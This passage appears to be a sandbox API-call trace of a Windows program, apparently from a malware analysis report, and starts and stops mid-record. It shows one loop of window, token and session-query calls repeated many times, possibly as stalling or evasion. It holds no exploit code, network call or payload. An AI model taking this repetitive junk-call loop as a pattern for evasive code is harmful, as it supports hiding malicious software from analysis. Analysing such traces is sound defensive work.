returned 0 [0072.846] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.846] GetTickCount () returned 0x1f4bb [0072.846] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.847] SetForegroundWindow (hWnd=0x0) returned 0 [0072.847] BringWindowToTop (hWnd=0x0) returned 0 [0072.847] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x90c) returned 1 [0072.847] GetTokenInformation (in: TokenHandle=0x90c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.847] GetLastError () returned 0x7a [0072.847] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.847] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.848] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.848] TextOutW (hdc=0x0, x=4384, y=10724, lpString="", c=0) returned 1 [0072.848] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.848] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.848] GetTickCount () returned 0x1f4cb [0072.849] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.849] SetForegroundWindow (hWnd=0x0) returned 0 [0072.849] BringWindowToTop (hWnd=0x0) returned 0 [0072.849] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x910) returned 1 [0072.849] GetTokenInformation (in: TokenHandle=0x910, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.849] GetLastError () returned 0x7a [0072.849] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.849] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.849] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.849] TextOutW (hdc=0x0, x=4394, y=10749, lpString="", c=0) returned 1 [0072.849] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.849] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.849] GetTickCount () returned 0x1f4cb [0072.850] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.850] SetForegroundWindow (hWnd=0x0) returned 0 [0072.850] BringWindowToTop (hWnd=0x0) returned 0 [0072.850] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x914) returned 1 [0072.850] GetTokenInformation (in: TokenHandle=0x914, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.850] GetLastError () returned 0x7a [0072.850] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.850] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.851] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.851] TextOutW (hdc=0x0, x=4404, y=10774, lpString="", c=0) returned 1 [0072.851] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.851] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.851] GetTickCount () returned 0x1f4cb [0072.852] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.852] SetForegroundWindow (hWnd=0x0) returned 0 [0072.852] BringWindowToTop (hWnd=0x0) returned 0 [0072.852] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x918) returned 1 [0072.852] GetTokenInformation (in: TokenHandle=0x918, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.852] GetLastError () returned 0x7a [0072.852] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.852] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.852] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.852] TextOutW (hdc=0x0, x=4414, y=10799, lpString="", c=0) returned 1 [0072.852] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.852] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.852] GetTickCount () returned 0x1f4cb [0072.853] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.853] SetForegroundWindow (hWnd=0x0) returned 0 [0072.853] BringWindowToTop (hWnd=0x0) returned 0 [0072.853] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x91c) returned 1 [0072.853] GetTokenInformation (in: TokenHandle=0x91c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.853] GetLastError () returned 0x7a [0072.853] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.853] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.854] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.854] TextOutW (hdc=0x0, x=4424, y=10824, lpString="", c=0) returned 1 [0072.854] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.854] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.854] GetTickCount () returned 0x1f4cb [0072.855] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.855] SetForegroundWindow (hWnd=0x0) returned 0 [0072.855] BringWindowToTop (hWnd=0x0) returned 0 [0072.855] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x920) returned 1 [0072.855] GetTokenInformation (in: TokenHandle=0x920, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.855] GetLastError () returned 0x7a [0072.855] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.855] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.855] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.855] TextOutW (hdc=0x0, x=4434, y=10849, lpString="", c=0) returned 1 [0072.855] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.855] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.855] GetTickCount () returned 0x1f4cb [0072.856] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.856] SetForegroundWindow (hWnd=0x0) returned 0 [0072.856] BringWindowToTop (hWnd=0x0) returned 0 [0072.856] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x924) returned 1 [0072.856] GetTokenInformation (in: TokenHandle=0x924, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.856] GetLastError () returned 0x7a [0072.856] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.856] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.857] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.857] TextOutW (hdc=0x0, x=4444, y=10874, lpString="", c=0) returned 1 [0072.857] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.857] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.857] GetTickCount () returned 0x1f4cb [0072.857] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.857] SetForegroundWindow (hWnd=0x0) returned 0 [0072.857] BringWindowToTop (hWnd=0x0) returned 0 [0072.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x928) returned 1 [0072.857] GetTokenInformation (in: TokenHandle=0x928, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.857] GetLastError () returned 0x7a [0072.857] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.857] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.858] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.858] TextOutW (hdc=0x0, x=4454, y=10899, lpString="", c=0) returned 1 [0072.858] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.858] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.858] GetTickCount () returned 0x1f4cb [0072.858] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.859] SetForegroundWindow (hWnd=0x0) returned 0 [0072.859] BringWindowToTop (hWnd=0x0) returned 0 [0072.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x92c) returned 1 [0072.859] GetTokenInformation (in: TokenHandle=0x92c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.859] GetLastError () returned 0x7a [0072.859] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.859] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.859] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.859] TextOutW (hdc=0x0, x=4464, y=10924, lpString="", c=0) returned 1 [0072.859] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.860] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.860] GetTickCount () returned 0x1f4cb [0072.864] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.864] SetForegroundWindow (hWnd=0x0) returned 0 [0072.864] BringWindowToTop (hWnd=0x0) returned 0 [0072.864] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x930) returned 1 [0072.864] GetTokenInformation (in: TokenHandle=0x930, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.864] GetLastError () returned 0x7a [0072.864] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.864] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.865] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.865] TextOutW (hdc=0x0, x=4474, y=10949, lpString="", c=0) returned 1 [0072.865] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.865] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.865] GetTickCount () returned 0x1f4da [0072.878] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.878] SetForegroundWindow (hWnd=0x0) returned 0 [0072.879] BringWindowToTop (hWnd=0x0) returned 0 [0072.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x934) returned 1 [0072.879] GetTokenInformation (in: TokenHandle=0x934, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.879] GetLastError () returned 0x7a [0072.879] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.879] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.880] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.880] TextOutW (hdc=0x0, x=4484, y=10974, lpString="", c=0) returned 1 [0072.880] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.880] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.880] GetTickCount () returned 0x1f4ea [0072.881] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.881] SetForegroundWindow (hWnd=0x0) returned 0 [0072.881] BringWindowToTop (hWnd=0x0) returned 0 [0072.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x938) returned 1 [0072.881] GetTokenInformation (in: TokenHandle=0x938, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.881] GetLastError () returned 0x7a [0072.881] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.881] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.882] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.882] TextOutW (hdc=0x0, x=4494, y=10999, lpString="", c=0) returned 1 [0072.882] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.882] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.882] GetTickCount () returned 0x1f4ea [0072.882] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.883] SetForegroundWindow (hWnd=0x0) returned 0 [0072.883] BringWindowToTop (hWnd=0x0) returned 0 [0072.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x93c) returned 1 [0072.883] GetTokenInformation (in: TokenHandle=0x93c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.883] GetLastError () returned 0x7a [0072.883] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.883] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.883] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.884] TextOutW (hdc=0x0, x=4504, y=11024, lpString="", c=0) returned 1 [0072.884] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.884] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.884] GetTickCount () returned 0x1f4ea [0072.884] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.885] SetForegroundWindow (hWnd=0x0) returned 0 [0072.885] BringWindowToTop (hWnd=0x0) returned 0 [0072.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x940) returned 1 [0072.885] GetTokenInformation (in: TokenHandle=0x940, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.885] GetLastError () returned 0x7a [0072.885] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.885] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.885] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.885] TextOutW (hdc=0x0, x=4514, y=11049, lpString="", c=0) returned 1 [0072.885] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.885] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.885] GetTickCount () returned 0x1f4ea [0072.886] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.886] SetForegroundWindow (hWnd=0x0) returned 0 [0072.886] BringWindowToTop (hWnd=0x0) returned 0 [0072.886] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x944) returned 1 [0072.886] GetTokenInformation (in: TokenHandle=0x944, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.886] GetLastError () returned 0x7a [0072.886] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.886] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.886] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.886] TextOutW (hdc=0x0, x=4524, y=11074, lpString="", c=0) returned 1 [0072.887] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.887] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.887] GetTickCount () returned 0x1f4ea [0072.894] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.894] SetForegroundWindow (hWnd=0x0) returned 0 [0072.894] BringWindowToTop (hWnd=0x0) returned 0 [0072.894] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x948) returned 1 [0072.894] GetTokenInformation (in: TokenHandle=0x948, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.894] GetLastError () returned 0x7a [0072.894] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.894] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.895] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.895] TextOutW (hdc=0x0, x=4534, y=11099, lpString="", c=0) returned 1 [0072.895] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.895] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.895] GetTickCount () returned 0x1f4fa [0072.896] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.896] SetForegroundWindow (hWnd=0x0) returned 0 [0072.896] BringWindowToTop (hWnd=0x0) returned 0 [0072.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x94c) returned 1 [0072.896] GetTokenInformation (in: TokenHandle=0x94c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.896] GetLastError () returned 0x7a [0072.896] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.896] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.897] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.897] TextOutW (hdc=0x0, x=4544, y=11124, lpString="", c=0) returned 1 [0072.897] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.897] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.897] GetTickCount () returned 0x1f4fa [0072.897] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.897] SetForegroundWindow (hWnd=0x0) returned 0 [0072.897] BringWindowToTop (hWnd=0x0) returned 0 [0072.897] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x950) returned 1 [0072.897] GetTokenInformation (in: TokenHandle=0x950, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.898] GetLastError () returned 0x7a [0072.898] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.898] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.898] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.898] TextOutW (hdc=0x0, x=4554, y=11149, lpString="", c=0) returned 1 [0072.898] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.898] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.898] GetTickCount () returned 0x1f4fa [0072.899] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.899] SetForegroundWindow (hWnd=0x0) returned 0 [0072.899] BringWindowToTop (hWnd=0x0) returned 0 [0072.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x954) returned 1 [0072.899] GetTokenInformation (in: TokenHandle=0x954, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.899] GetLastError () returned 0x7a [0072.899] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.899] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.900] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.900] TextOutW (hdc=0x0, x=4564, y=11174, lpString="", c=0) returned 1 [0072.900] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.900] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.900] GetTickCount () returned 0x1f4fa [0072.900] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.900] SetForegroundWindow (hWnd=0x0) returned 0 [0072.900] BringWindowToTop (hWnd=0x0) returned 0 [0072.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x958) returned 1 [0072.901] GetTokenInformation (in: TokenHandle=0x958, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0072.901] GetLastError () returned 0x7a [0072.901] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0072.901] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0072.901] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0072.901] TextOutW (hdc=0x0, x=4574, y=11199, lpString="", c=0) returned 1 [0072.901] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0072.901] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0072.901] GetTickCount () returned 0x1f4fa [0072.902] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0072.902] SetForegroundWindow (hWnd=0x0) returned 0 [0072.902] BringWindowToTop (hWnd=0x0) returned 0 [0072.902] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x95c) returned 1 [0072.902] GetTokenInformation (in: TokenHandle=0x95c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, 